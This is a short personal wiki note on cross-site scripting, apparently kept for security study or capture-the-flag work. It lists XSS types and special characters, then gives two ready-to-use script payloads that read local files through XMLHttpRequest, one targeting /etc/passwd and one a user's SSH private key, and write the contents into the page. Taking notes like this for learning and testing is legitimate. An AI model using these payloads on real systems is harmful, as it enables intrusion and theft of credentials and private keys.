Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-05-21T09:06:12-04:00

====== xss ======
Created Thursday 21 May 2020

cross site scripting

* reflected Xss
* Stored Xss
* Dom xss

The most common special characters used for this purpose include:
**< > ' " { } ;**


**<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open**
**("GET","file:///etc/passwd");x.send();</script>**



read if there any ssh_key (note reader is user here)
**<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open**
**("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>**
